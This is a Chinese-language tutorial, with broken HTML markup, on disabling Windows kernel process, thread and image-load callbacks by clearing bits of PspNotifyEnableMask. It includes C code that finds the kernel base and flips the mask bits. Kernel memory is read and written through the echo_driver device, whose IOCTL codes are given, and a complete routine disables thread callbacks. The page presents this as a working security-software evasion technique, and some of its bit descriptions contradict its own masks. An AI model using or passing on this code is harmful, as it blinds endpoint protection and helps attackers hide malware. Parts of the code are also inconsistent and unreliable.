内核回调清除技术详解<\/h1>

1. 内核回调机制概述<\/h2>

Windows内核提供了三种主要的回调机制，用于监控系统活动：<\/p>

进程创建回调<\/strong> - PsSetCreateProcessNotifyRoutine<\/code><\/li>
线程创建回调<\/strong> - PsSetCreateThreadNotifyRoutine<\/code><\/li>

映像加载回调<\/strong> - PsSetLoadImageNotifyRoutine<\/code><\/li> <\/ol> 这些回调通过PspNotifyEnableMask<\/code>全局变量控制是否启用。<\/p> 2. PspNotifyEnableMask 机制<\/h2> PspNotifyEnableMask<\/code>是一个关键全局变量，它决定了哪些类型的回调会被执行：<\/p> 进程回调<\/strong>：由第一位和第二位控制<\/li> 线程回调<\/strong>：由第三位和第四位控制<\/li> 映像加载回调<\/strong>：由第0位控制<\/li> <\/ul> 当相应位被置0时，对应类型的回调将不再触发。<\/p> 3. 定位PspNotifyEnableMask<\/h2> 3.1 特征码搜索方法<\/h3> 可以通过以下步骤定位PspNotifyEnableMask<\/code>：<\/p> 首先获取ntoskrnl模块基地址<\/li> 通过导出函数PoRegisterCoalescingCallback<\/code>向下搜索<\/li> 找到PspNotifyEnableMask<\/code>的内存位置<\/li> <\/ol> 3.2 代码实现示例<\/h3> \/\/ 获取ntoskrnl基地址 <\/span><\/span><\/span><\/span>PVOID GetNtoskrnlBase<\/span>() { <\/span><\/span> ULONG size =<\/span> 0<\/span>; <\/span><\/span> ZwQuerySystemInformation(SystemModuleInformation, NULL, 0<\/span>, &<\/span>size); <\/span><\/span> <\/span><\/span> PRTL_PROCESS_MODULES modules =<\/span> ExAllocatePool(NonPagedPool, size); <\/span><\/span> ZwQuerySystemInformation(SystemModuleInformation, modules, size, NULL); <\/span><\/span> <\/span><\/span> PVOID base =<\/span> modules-><\/span>Modules[0<\/span>].ImageBase; <\/span><\/span> ExFreePool(modules); <\/span><\/span> return<\/span> base; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 搜索PspNotifyEnableMask <\/span><\/span><\/span><\/span>ULONG64 FindPspNotifyEnableMask<\/span>(PVOID ntoskrnlBase) { <\/span><\/span> \/\/ 实际实现中需要根据具体Windows版本编写特征码搜索逻辑 <\/span><\/span><\/span><\/span> \/\/ 这里省略具体实现细节 <\/span><\/span><\/span><\/span> return<\/span> maskAddress; <\/span><\/span>} <\/span><\/span><\/code><\/pre>4. 清除回调的具体方法<\/h2> 4.1 清除进程创建回调<\/h3> 将PspNotifyEnableMask<\/code>的第一位和第二位置0：<\/p> ULONG64 maskAddr =<\/span> FindPspNotifyEnableMask(ntoskrnlBase); <\/span><\/span>ULONG maskValue =<\/span> ReadMemory(maskAddr); \/\/ 使用内核内存读取函数 <\/span><\/span><\/span><\/span>maskValue &=<\/span> ~<\/span>0x3<\/span>; \/\/ 清除最低两位 <\/span><\/span><\/span><\/span>WriteMemory(maskAddr, maskValue); \/\/ 使用内核内存写入函数 <\/span><\/span><\/span><\/code><\/pre>4.2 清除线程创建回调<\/h3> 将PspNotifyEnableMask<\/code>的第三位和第四位置0：<\/p> ULONG64 maskAddr =<\/span> FindPspNotifyEnableMask(ntoskrnlBase); <\/span><\/span>ULONG maskValue =<\/span> ReadMemory(maskAddr); <\/span><\/span>maskValue &=<\/span> ~<\/span>0xC<\/span>; \/\/ 清除第三和第四位(0xC = 1100b) <\/span><\/span><\/span><\/span>WriteMemory(maskAddr, maskValue); <\/span><\/span><\/code><\/pre>4.3 清除映像加载回调<\/h3> 将PspNotifyEnableMask<\/code>的第0位置0：<\/p> ULONG64 maskAddr =<\/span> FindPspNotifyEnableMask(ntoskrnlBase); <\/span><\/span>ULONG maskValue =<\/span> ReadMemory(maskAddr); <\/span><\/span>maskValue &=<\/span> ~<\/span>0x1<\/span>; \/\/ 清除第0位 <\/span><\/span><\/span><\/span>WriteMemory(maskAddr, maskValue); <\/span><\/span><\/code><\/pre>5. 利用EchoDriver实现内存读写<\/h2> 文章提到可以使用echo_driver<\/code>进行内存操作，具体方法如下：<\/p> 驱动程序符号链接：\??\DosDevices\EchoDrv<\/code><\/li> 关键IOCTL代码：0x9e6a0594<\/code><\/li> 内存复制功能：通过0x60A26124<\/code>调用MmCopyVirtualMemory<\/code><\/li> <\/ol> 5.1 通信结构定义<\/h3> typedef<\/span> struct<\/span> _ECHO_DRV_REQUEST { <\/span><\/span> ULONG_PTR Address; <\/span><\/span> ULONG Size; <\/span><\/span> PVOID Buffer; <\/span><\/span> ULONG Operation; \/\/ 0 = read, 1 = write <\/span><\/span><\/span><\/span> ULONG_PTR Result; <\/span><\/span>} ECHO_DRV_REQUEST, *<\/span>PECHO_DRV_REQUEST; <\/span><\/span><\/code><\/pre>5.2 使用示例<\/h3> HANDLE OpenEchoDriver<\/span>() { <\/span><\/span> UNICODE_STRING devName =<\/span> RTL_CONSTANT_STRING(L<\/span>"<\/span>\\<\/span>??<\/span>\\<\/span>DosDevices<\/span>\\<\/span>EchoDrv"<\/span>); <\/span><\/span> OBJECT_ATTRIBUTES objAttr; <\/span><\/span> InitializeObjectAttributes(&<\/span>objAttr, &<\/span>devName, OBJ_CASE_INSENSITIVE, NULL, NULL); <\/span><\/span> <\/span><\/span> IO_STATUS_BLOCK ioStatus; <\/span><\/span> HANDLE hDevice; <\/span><\/span> NTSTATUS status =<\/span> ZwOpenFile(&<\/span>hDevice, GENERIC_READ |<\/span> GENERIC_WRITE, &<\/span>objAttr, &<\/span>ioStatus, <\/span><\/span> FILE_SHARE_READ |<\/span> FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT); <\/span><\/span> if<\/span> (NT_SUCCESS(status)) { <\/span><\/span> return<\/span> hDevice; <\/span><\/span> } <\/span><\/span> return<\/span> NULL; <\/span><\/span>} <\/span><\/span> <\/span><\/span>NTSTATUS EchoReadMemory<\/span>(HANDLE hDevice, ULONG_PTR address, PVOID buffer, ULONG size) { <\/span><\/span> ECHO_DRV_REQUEST request =<\/span> {0<\/span>}; <\/span><\/span> request.Address =<\/span> address; <\/span><\/span> request.Size =<\/span> size; <\/span><\/span> request.Buffer =<\/span> buffer; <\/span><\/span> request.Operation =<\/span> 0<\/span>; \/\/ read <\/span><\/span><\/span><\/span> <\/span><\/span> IO_STATUS_BLOCK ioStatus; <\/span><\/span> return<\/span> ZwDeviceIoControlFile(hDevice, NULL, NULL, NULL, &<\/span>ioStatus, <\/span><\/span> 0x9e6a0594<\/span>, &<\/span>request, sizeof<\/span>(request), &<\/span>request, sizeof<\/span>(request)); <\/span><\/span>} <\/span><\/span><\/code><\/pre>6. 完整清除线程回调示例<\/h2> void<\/span> DisableThreadCallbacks<\/span>() { <\/span><\/span> \/\/ 1. 获取ntoskrnl基地址 <\/span><\/span><\/span><\/span> PVOID ntoskrnlBase =<\/span> GetNtoskrnlBase(); <\/span><\/span> <\/span><\/span> \/\/ 2. 查找PspNotifyEnableMask地址 <\/span><\/span><\/span><\/span> ULONG64 maskAddr =<\/span> FindPspNotifyEnableMask(ntoskrnlBase); <\/span><\/span> <\/span><\/span> \/\/ 3. 打开echo驱动 <\/span><\/span><\/span><\/span> HANDLE hEcho =<\/span> OpenEchoDriver(); <\/span><\/span> if<\/span> (!<\/span>hEcho) return<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 4. 读取当前mask值 <\/span><\/span><\/span><\/span> ULONG maskValue =<\/span> 0<\/span>; <\/span><\/span> EchoReadMemory(hEcho, maskAddr, &<\/span>maskValue, sizeof<\/span>(maskValue)); <\/span><\/span> <\/span><\/span> \/\/ 5. 清除线程回调位(第三和第四位) <\/span><\/span><\/span><\/span> maskValue &=<\/span> ~<\/span>0xC<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 6. 写回新值 <\/span><\/span><\/span><\/span> EchoWriteMemory(hEcho, maskAddr, &<\/span>maskValue, sizeof<\/span>(maskValue)); <\/span><\/span> <\/span><\/span> \/\/ 7. 关闭驱动句柄 <\/span><\/span><\/span><\/span> ZwClose(hEcho); <\/span><\/span>} <\/span><\/span><\/code><\/pre>7. 注意事项<\/h2> 不同Windows版本的PspNotifyEnableMask<\/code>位置可能不同，需要针对特定版本调整特征码<\/li> 直接修改内核内存可能导致系统不稳定<\/li> 此技术可能被安全软件检测为恶意行为<\/li> 在生产环境中使用前应充分测试<\/li> <\/ol> 8. 效果验证<\/h2> 清除成功后：<\/p> 进程创建回调将不再触发<\/li> 线程创建回调将不再触发<\/li> 映像加载回调将不再触发<\/li> <\/ul> 可以通过监控工具如Process Monitor或自定义内核驱动程序验证回调是否已被禁用。<\/p> 9. 替代方案<\/h2> 除了修改PspNotifyEnableMask<\/code>，还可以考虑：<\/p> 从回调链中移除特定回调<\/li> 挂钩回调调用函数<\/li> 修改回调函数指针<\/li> <\/ol> 但这些方法通常需要更深入的内核知识，且兼容性可能较差。<\/p>